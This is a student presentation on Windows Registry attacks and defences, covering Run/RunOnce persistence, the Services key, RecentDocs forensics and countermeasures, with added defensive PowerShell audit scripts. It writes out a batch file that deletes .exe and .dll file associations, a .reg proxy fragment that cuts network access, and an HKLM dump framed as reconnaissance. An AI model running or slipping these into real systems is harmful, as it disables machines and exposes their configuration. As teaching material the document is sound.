Windows Registry For Ethical Hacking

Uploaded by isaac (20 pages)

WINDOWS REGISTRY

FOR ETHICAL HACKING


GROUP 1
INTRODUCTION
The Windows Registry is a hierarchical database in which the Windows operating system, and the programs that run on it, store their low-level data and settings.

The Windows Registry is akin to the DNA of the Windows operating system.
These settings and entries can be modified, created, or deleted to change the behaviour of the Windows operating system and of the software that runs within it.

Attackers use this in three ways: for reconnaissance (reading what the registry records about the machine and its users), for persistence (making their own programs run at every logon), and to cause direct damage to the target computer, for example by disabling security features or destroying keys the system depends on.
How to access Registry Editor
- Press Windows + R
- Type REGEDIT
- Press OK

Editing keys under HKEY_LOCAL_MACHINE requires administrative rights (regedit prompts for elevation when launched by an administrator); the logged-on user can edit HKEY_CURRENT_USER without elevation.
WINDOWS REGISTRY STRUCTURE
- HKEY_CLASSES_ROOT: holds file-type associations and COM class registrations. It is a merged view of HKEY_LOCAL_MACHINE\Software\Classes and HKEY_CURRENT_USER\Software\Classes, so an entry here tells you which program opens which file type.
- HKEY_CURRENT_USER: holds the settings of the user that is currently logged in. This is actually just a link to the matching sub-key of HKEY_USERS (named after the user's SID) and contains exactly the same information.
- HKEY_LOCAL_MACHINE: holds settings that apply to the entire local computer, including installed software, service definitions and the machine-wide autostart entries. This is where the most interesting information, for our purposes, can be found.
- HKEY_USERS: holds settings for all users of the local computer, one sub-key per loaded user hive.
- HKEY_CURRENT_CONFIG: holds information gathered at startup about the hardware profile in use (a link to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current). There is not much interesting information stored here.
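The link between HKEY_CURRENT_USER and HKEY_USERS is easy to verify from a PowerShell prompt. The script below is an added example, not part of the presentation; it reads the per-user TEMP value through both paths (the Environment sub-key exists in every user hive by default) and lists the hives currently loaded under HKEY_USERS.

```powershell
# Added example (not from the presentation): show that HKEY_CURRENT_USER is a
# link to HKEY_USERS\<SID of the current user>, and list the loaded user hives.
# Assumes an interactive session in Windows PowerShell 5.1 or PowerShell 7.

$sid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
Write-Host "Current user SID: $sid"

# The same value read through both paths; they must agree.
$viaHkcu = (Get-ItemProperty -Path 'HKCU:\Environment').TEMP
$viaHku  = (Get-ItemProperty -Path "Registry::HKEY_USERS\$sid\Environment").TEMP
"HKCU       -> $viaHkcu"
"HKU\<SID>  -> $viaHku"
if ($viaHkcu -ne $viaHku) { Write-Warning 'HKCU does not resolve to HKU\<SID>' }

# One sub-key per loaded user hive, plus .DEFAULT and the *_Classes hives.
Get-ChildItem -Path 'Registry::HKEY_USERS' | Select-Object -ExpandProperty PSChildName
```

Why this matters for the rest of the slides: code running as SYSTEM (a service, a scheduled task) sees a different HKEY_CURRENT_USER, the S-1-5-18 hive, so a value it writes "to HKCU" does not appear in the interactive user's view of the same key, and vice versa.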
VULNERABILITIES AND COUNTERMEASURES

RecentDocs Key
If you suspect that your computer has been breached, one of the first things you would want to know is whether an unauthorized user has accessed any of your sensitive files. Explorer keeps a per-user "most recently used" list of opened documents at this location:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

Two caveats: the key records what the account was used to open (through Explorer and the common Open/Save dialogs), not who was at the keyboard, and because it lives under HKEY_CURRENT_USER you must inspect the hive of the account in question (under HKEY_USERS while that user is logged on, or its NTUSER.DAT file offline). The numbered values are binary, with the document name stored as a UTF-16 string, and the MRUListEx value gives the order from most to least recent, so reading the key in regedit alone does not tell you the order of access.
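Decoding the key by hand is tedious, so here is an added example (not part of the presentation) that lists the documents in most-recent-first order. It relies on two properties of the key: each numbered value begins with the document name as a null-terminated UTF-16LE string, and MRUListEx is an array of little-endian DWORD indices into those values, terminated by 0xFFFFFFFF. The same layout is used by the per-extension sub-keys (.docx, .pdf, Folder, ...).

```powershell
# Added example (not from the presentation): list recently opened documents
# from RecentDocs in most-recent-first order. Assumes Windows PowerShell 5.1 /
# PowerShell 7 running as the user whose hive is being inspected.

function Get-RecentDocs {
    param([string]$Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs')

    $key = Get-Item -Path $Path -ErrorAction Stop
    $mru = $key.GetValue('MRUListEx')        # byte[]: DWORD indices, 0xFFFFFFFF terminator
    if (-not $mru) { return }

    for ($i = 0; $i + 4 -le $mru.Length; $i += 4) {
        $index = [BitConverter]::ToUInt32($mru, $i)
        if ($index -eq 0xFFFFFFFF) { break }

        $raw = $key.GetValue([string]$index) # values are named "0", "1", ...
        if (-not $raw) { continue }

        # The name ends at the first UTF-16 null (two zero bytes on an even offset).
        $end = 0
        while ($end + 1 -lt $raw.Length -and -not ($raw[$end] -eq 0 -and $raw[$end + 1] -eq 0)) { $end += 2 }
        $name = [Text.Encoding]::Unicode.GetString($raw, 0, $end)

        [pscustomobject]@{ Rank = $i / 4; Index = $index; Name = $name; Key = $key.PSChildName }
    }
}

# The top-level list, then every per-extension sub-key.
Get-RecentDocs | Format-Table -AutoSize
Get-ChildItem 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs' |
    ForEach-Object { Get-RecentDocs -Path $_.PSPath } |
    Format-Table -AutoSize
```

To examine another user's hive, pass a path under Registry::HKEY_USERS\<SID>\... as -Path, or load the user's NTUSER.DAT with reg load first.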
VULNERABILITIES
THE RUN REGISTRY KEY:
The most-used location for attackers is this:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Every value under this key is a command line that Windows executes at each user logon, so it is the classic place to make key-loggers, spyware or a rootkit's loader start automatically. The same key exists under HKEY_CURRENT_USER (writable without administrative rights, and therefore the usual choice for malware running as a standard user) and, on 64-bit systems, under Software\WOW6432Node for 32-bit programs.
VULNERABILITIES
THE RUN-ONCE REGISTRY KEY:
Entries here run once at the next logon and are then deleted, which is how installers finish their setup after a reboot and how a dropper can run a second stage without leaving a persistent entry behind. If you suspect that a file that only needs to run once during startup infected your computer, look here:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Because the entry deletes itself after running, it may already be gone by the time you look; check the HKEY_CURRENT_USER copy of the key as well.
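The following added example (not part of the presentation) is the search for "strange startup apps" that the counter-measures slide recommends, written out for all six Run/RunOnce locations. For each entry it extracts the executable from the command line, checks whether it lives in a directory a standard user can write to, and checks its Authenticode signature. The directory list and the flag names are assumptions chosen for this example.

```powershell
# Added example (not from the presentation): audit Run/RunOnce entries.
# Assumes Windows PowerShell 5.1 / PowerShell 7; run elevated to read HKLM
# keys that were written by other users.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Directories an unprivileged user can write to (assumed list); an autostart here is suspicious.
$userWritable = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA, $env:PUBLIC, "$env:USERPROFILE\Downloads")

function Get-ExecutablePath([string]$command) {
    # "C:\dir\app.exe" --arg   |   C:\dir\app.exe /s   |   app.exe
    if ($command -match '^\s*"([^"]+)"')  { return $Matches[1] }
    if ($command -match '^\s*(\S+\.exe)') { return $Matches[1] }
    return ($command -split '\s+')[0]
}

function Find-SuspiciousAutorun {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }        # provider metadata, not registry values
            $cmd   = [string]$p.Value
            $exe   = [Environment]::ExpandEnvironmentVariables((Get-ExecutablePath $cmd))
            $flags = @()
            foreach ($dir in $userWritable) {
                if ($dir -and $exe.StartsWith($dir, [StringComparison]::OrdinalIgnoreCase)) { $flags += 'user-writable-path' }
            }
            if ($exe -and (Test-Path -LiteralPath $exe)) {
                $sig = Get-AuthenticodeSignature -FilePath $exe
                if ($sig.Status -ne 'Valid') { $flags += "signature:$($sig.Status)" }
            } else {
                $flags += 'binary-missing'
            }
            [pscustomobject]@{
                Key     = $key
                Name    = $p.Name
                Command = $cmd
                Flags   = ($flags | Select-Object -Unique) -join ','
            }
        }
    }
}

Find-SuspiciousAutorun | Format-Table -AutoSize
```

An empty Flags column is not a clean bill of health (signed binaries can be abused through their arguments), but a signature of NotSigned combined with a path under %APPDATA% or %TEMP% is the pattern most commodity malware leaves behind.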
VULNERABILITIES
STARTUP SERVICES:
Every Windows service and kernel driver is defined by a sub-key here, whose Start value (0 boot, 1 system, 2 automatic, 3 manual, 4 disabled) and ImagePath value decide whether it loads and from which binary. Writing to this key (administrative rights are required) can therefore disable security features of the Windows operating system, for example by setting a protection service to Disabled or by pointing its ImagePath at another binary, thereby making the computer vulnerable to other attacks. The same mechanism registers a malicious service so that it starts before any user logs on.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
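The defensive counterpart is to read those same values for the services you depend on and flag anything disabled or re-pointed. The script below is an added example, not part of the presentation; the list of services to watch and the expected install locations are assumptions and should be adapted to the products present on the host.

```powershell
# Added example (not from the presentation): check Start type and ImagePath of
# security-relevant services straight from the Services key. Run elevated.
# Start values: 0 boot, 1 system, 2 automatic, 3 manual, 4 disabled.

$watch = @{                                   # assumed list; extend as needed
    'WinDefend' = 'Microsoft Defender Antivirus'
    'MpsSvc'    = 'Windows Defender Firewall'
    'wscsvc'    = 'Security Center'
    'EventLog'  = 'Windows Event Log'
    'Sense'     = 'Defender for Endpoint sensor (absent unless onboarded)'
}

function Test-SecurityServices {
    foreach ($name in $watch.Keys) {
        $path = "HKLM:\SYSTEM\CurrentControlSet\Services\$name"
        if (-not (Test-Path $path)) {
            [pscustomobject]@{ Service = $name; Start = $null; ImagePath = $null; Finding = 'key missing' }
            continue
        }
        $svc   = Get-ItemProperty -Path $path
        $image = [Environment]::ExpandEnvironmentVariables([string]$svc.ImagePath)
        $finding = @()
        if ($svc.Start -eq 4) { $finding += 'disabled' }
        # Microsoft services load from Windows, Program Files or ProgramData\Microsoft (assumed allow-list).
        if ($image -and $image -notmatch '^"?[A-Za-z]:\\(Windows|Program Files|ProgramData\\Microsoft)\\') {
            $finding += 'unexpected ImagePath'
        }
        $text = if ($finding) { $finding -join ', ' } else { 'ok' }
        [pscustomobject]@{ Service = $name; Start = $svc.Start; ImagePath = $image; Finding = $text }
    }
}

Test-SecurityServices | Format-Table -AutoSize
```

A Start of 4 on WinDefend with the ImagePath intact is the registry footprint of "Defender was turned off"; a changed ImagePath is the footprint of a service-binary hijack. Either finding warrants comparing the key against a known-good export.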
VULNERABILITIES
DISABLE NETWORK CONNECTIVITY:
Network connectivity can be cut for proxy-aware programs (browsers and anything using WinINet or WinHTTP) by importing a .reg file such as the fragment below. It changes the computer's proxy setting to point at a local address on which nothing is listening, so every proxied connection fails; programs that open sockets directly are not affected, and a proxy that does listen would instead see all of that traffic. The values are binary: WinHttpSettings is the machine-wide WinHTTP proxy (the same value netsh winhttp set proxy writes), and DefaultConnectionSettings / SavedLegacySettings are the WinINet per-connection settings. Note that the WinHttpSettings data shown (flag value 1 at offset 8) is the encoding for direct access, so the redirection must be carried by the other two values, whose hex data is not reproduced on the slide; a complete file also needs the "Windows Registry Editor Version 5.00" header line before regedit will import it.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"WinHttpSettings"=hex:18,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,\
  00
"DefaultConnectionSettings"=hex:
"SavedLegacySettings"=hex:
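From the defender's side the question is simply "where is my traffic being sent?". The added example below (not part of the presentation) reads the documented WinINet values (ProxyEnable, ProxyServer, AutoConfigURL) for the current user and the machine-wide WinHTTP setting via netsh, and flags a proxy on the loopback address or a PAC script, which is what both the connectivity cut above and a traffic-interception attack look like. The English string matched in the netsh output is an assumption that holds on English-language Windows.

```powershell
# Added example (not from the presentation): report the effective proxy
# configuration and flag hijack indicators. Assumes Windows PowerShell 5.1 /
# PowerShell 7 on an English-language system (netsh output is localized).

function Get-ProxyState {
    $wininet = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
    $winhttp = (netsh winhttp show proxy) -join ' '

    $findings = @()
    if ($wininet.ProxyEnable -eq 1) {
        $findings += "WinINet proxy enabled: $($wininet.ProxyServer)"
        # "host:port" or "http=host:port;https=host:port"; loopback means nothing or something local is listening.
        if ($wininet.ProxyServer -match '(^|=)(127\.|localhost|0\.0\.0\.0)') { $findings += 'WinINet proxy is loopback' }
    }
    if ($wininet.AutoConfigURL) { $findings += "PAC script: $($wininet.AutoConfigURL)" }
    if ($winhttp -notmatch 'Direct access') { $findings += "WinHTTP: $winhttp" }

    $summary = if ($findings) { $findings -join '; ' } else { 'none' }
    [pscustomobject]@{
        ProxyEnable   = $wininet.ProxyEnable
        ProxyServer   = $wininet.ProxyServer
        AutoConfigURL = $wininet.AutoConfigURL
        Findings      = $summary
    }
}

Get-ProxyState | Format-List

# Remediation once a hijack is confirmed (netsh needs an elevated prompt):
#   Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyEnable 0
#   Remove-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' AutoConfigURL -ErrorAction SilentlyContinue
#   netsh winhttp reset proxy
```

The binary DefaultConnectionSettings value is the authoritative WinINet store and is what the slide's .reg file overwrites; ProxyEnable and ProxyServer are kept in sync with it by Internet Options, so for a quick check the string values are enough, but a forensic comparison should also export the Connections key itself.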
VULNERABILITIES
A BATCH FILE THAT DELETES REGISTRY KEYS:
A text file can be created in Notepad containing the following code:

@ECHO OFF
START reg delete HKCR\.exe
START reg delete HKCR\.dll
START reg delete HKCR\*

The slide describes this as deleting "the entire Windows Registry file" when saved as a .bat file and run, but that is not what it does. reg delete removes only the named keys: HKCR\.exe and HKCR\.dll are the file-type associations for executables and libraries, and HKCR\* is a literal key name (the class whose verbs apply to all files), not a wildcard. Because the script does not pass /f, each reg delete opens a console window and waits for a Yes/No confirmation, and since these HKCR keys resolve to HKEY_LOCAL_MACHINE\Software\Classes the deletion fails with "Access is denied" unless the script runs with administrative rights. When it does succeed, Explorer can no longer launch .exe files by double-click and the shell context menus break, which makes the machine very hard to use, but the registry hive files on disk are untouched: the keys can be restored from a previous export, copied from another machine of the same Windows build, or brought back by System Restore. Re-installing the OS is the last resort, not the only solution.
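Since recovery depends on having a copy of those keys, the added example below (not part of the presentation) does two things a practitioner would want ready before, not after, such an attack: it verifies that the .exe association chain still has its Windows default values (HKCR\.exe points to "exefile" and exefile\shell\open\command is "%1" %*), and it exports the four keys the batch file targets so that they can be restored with reg import. The backup folder name is an assumption.

```powershell
# Added example (not from the presentation): check and back up the .exe/.dll
# association keys. Run elevated so the export (and a later reg import) can
# reach the HKLM-backed classes.

function Test-ExeAssociation {
    $assoc   = (Get-ItemProperty -Path 'Registry::HKEY_CLASSES_ROOT\.exe' -ErrorAction SilentlyContinue).'(default)'
    $command = (Get-ItemProperty -Path 'Registry::HKEY_CLASSES_ROOT\exefile\shell\open\command' -ErrorAction SilentlyContinue).'(default)'
    [pscustomobject]@{
        DotExe      = $assoc
        OpenCommand = $command
        Healthy     = ($assoc -eq 'exefile') -and ($command -eq '"%1" %*')   # Windows defaults
    }
}

function Backup-ExeAssociation([string]$Folder = "$env:ProgramData\RegBackup") {   # assumed location
    New-Item -ItemType Directory -Path $Folder -Force | Out-Null
    foreach ($key in 'HKCR\.exe', 'HKCR\.dll', 'HKCR\exefile', 'HKCR\*') {
        $file = Join-Path $Folder (($key -replace '[\\*]', '_') + '.reg')
        reg export $key $file /y | Out-Null
        if ($LASTEXITCODE -ne 0) { Write-Warning "export of $key failed" }
    }
    Get-ChildItem -Path $Folder -Filter *.reg
}

Test-ExeAssociation
Backup-ExeAssociation
```

If Healthy is false but the keys still exist, the more likely cause is a hijacked exefile\shell\open\command (malware that inserts itself before "%1" so that it runs every time any program is started); restore the exported file with reg import from an elevated prompt in either case.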
VULNERABILITIES
CREATING A REGISTRY DUMP FOR RECONNAISSANCE:
The following commands export the whole of HKEY_LOCAL_MACHINE to a text file, which contains the installed software, service definitions, machine-wide autostart entries and much more, and which can then be sent to an attacker. (The slide's claim that it also captures recent documents and typed URLs is wrong for this particular command: those live under HKEY_CURRENT_USER, which is not part of HKEY_LOCAL_MACHINE.)

if exist %temp%\version.txt del /q %temp%\version.txt

regedit /e %temp%\version.txt "HKEY_LOCAL_MACHINE\"
start %temp%\version.txt

Three practical notes: the export is written in UTF-16 and runs to hundreds of megabytes, so opening it with start is slow and a real tool exports only the keys of interest; the SAM and SECURITY hives under HKEY_LOCAL_MACHINE are not readable by normal accounts (not even administrators) and are skipped; and reg export HKLM file.reg does the same job from a script without launching the graphical editor.
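The targeted version of that export, as an added example that is not part of the presentation, looks like this. The list of keys is an assumption chosen to answer the usual reconnaissance (and, equally, incident-response triage) questions: what starts automatically, what services exist, what software is installed, which networks the machine has joined, and what the current user has opened or browsed. Each export is summarised by size and by the number of keys it captured.

```powershell
# Added example (not from the presentation): export a curated set of keys
# instead of all of HKLM. Assumes Windows PowerShell 5.1 / PowerShell 7; run
# elevated for the HKLM targets.

$targets = @{                                   # assumed list; add or remove as needed
    'autostart-hklm'   = 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'autostart-hkcu'   = 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'services'         = 'HKLM\SYSTEM\CurrentControlSet\Services'
    'installed-sw'     = 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
    'typed-urls'       = 'HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs'
    'recent-docs'      = 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs'
    'network-profiles' = 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles'
}

function Export-RegistryTargets([string]$OutDir = (Join-Path $env:TEMP ('regdump-' + (Get-Date -Format 'yyyyMMdd-HHmmss')))) {
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    foreach ($name in $targets.Keys) {
        $file = Join-Path $OutDir "$name.reg"
        reg export $targets[$name] $file /y 2>$null | Out-Null
        $ok = ($LASTEXITCODE -eq 0)               # non-zero when the key is missing or unreadable
        $sizeKB = 0; $keys = 0
        if ($ok) {
            $sizeKB = [math]::Round((Get-Item -Path $file).Length / 1KB)
            # Every "[HKEY_...]" line in a .reg export is one captured key.
            $keys = (Select-String -Path $file -Pattern '^\[HKEY_' | Measure-Object).Count
        }
        [pscustomobject]@{ Target = $name; Exported = $ok; SizeKB = $sizeKB; Keys = $keys }
    }
    Write-Host "Exports written to $OutDir"
}

Export-RegistryTargets | Format-Table -AutoSize
```

The same key list, exported on a clean machine and again after an incident, gives a pair of text files that can be diffed directly, which is the cheapest way to spot a new Run value or service.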
PACKAGE DELIVERY
A package containing malicious registry files can be delivered using a variety of methods.
For the sake of this presentation, we use a Trojan-horse approach, attaching the payload to a legitimate piece of software.
Actual Installer was used to create the payload.
COUNTER-MEASURES
Disable Recent Documents History:

User key:   [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Value name: NoRecentDocsHistory
Data type:  REG_DWORD (DWORD Value)
Value data: 0 = disable restriction (history is kept), 1 = enable restriction (history is not kept)
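Applied from PowerShell, with the companion policy value ClearRecentDocsOnExit (same key, same type; it purges the existing list at logoff rather than merely stopping new entries), the setting above looks like this. This is an added example and not part of the presentation; it writes the per-user key, which needs no elevation, while the HKEY_LOCAL_MACHINE variant applies to all users and requires an elevated prompt.

```powershell
# Added example (not from the presentation): set and verify the Explorer
# policy that stops RecentDocs from being populated.

$policyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'

function Set-RecentDocsPolicy([switch]$Disable) {
    if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
    $value = if ($Disable) { 1 } else { 0 }
    Set-ItemProperty -Path $policyKey -Name NoRecentDocsHistory   -Value $value -Type DWord
    Set-ItemProperty -Path $policyKey -Name ClearRecentDocsOnExit -Value $value -Type DWord
}

function Get-RecentDocsPolicy {
    $p = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue
    [pscustomobject]@{
        NoRecentDocsHistory   = $p.NoRecentDocsHistory
        ClearRecentDocsOnExit = $p.ClearRecentDocsOnExit
        Effective             = ($p.NoRecentDocsHistory -eq 1)
    }
}

Set-RecentDocsPolicy -Disable
Get-RecentDocsPolicy
# Explorer reads the policy at start-up: sign out, or restart explorer.exe, for it to take effect.
```

Note the trade-off: the same setting that denies an intruder this evidence also denies it to the investigator, so on a monitored system it is usually better to leave the history on and collect it centrally.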
COUNTER-MEASURES
- Do NOT grant administrative access to anyone who does not need it, and do not use an administrator account for day-to-day work: every HKEY_LOCAL_MACHINE attack above requires it.
- Do not open untrusted executable files or software on your computer; a .reg or .bat file is as dangerous as an .exe.
- Conduct occasional searches for strange startup apps (the Run, RunOnce and Services keys); Sysinternals Autoruns lists all of them in one place.
- Conduct periodic anti-virus scans.
- Enable real-time protection to prevent malicious code from gaining access.
- Keep an export of important keys, or a System Restore point, so that destroyed keys can be restored.
CONCLUSION
In conclusion, the Windows Registry is a potent tool both for computer users and for attackers.
It is therefore important to use the Windows Registry responsibly and not to dabble in settings whose function you are unsure of.
The limitation of registry-based attacks is that they are platform dependent: the registry exists only on Windows, so these attacks cannot be used as-is against other operating systems, although those systems have their own configuration stores and autostart mechanisms that play the same role.
THANK YOU!
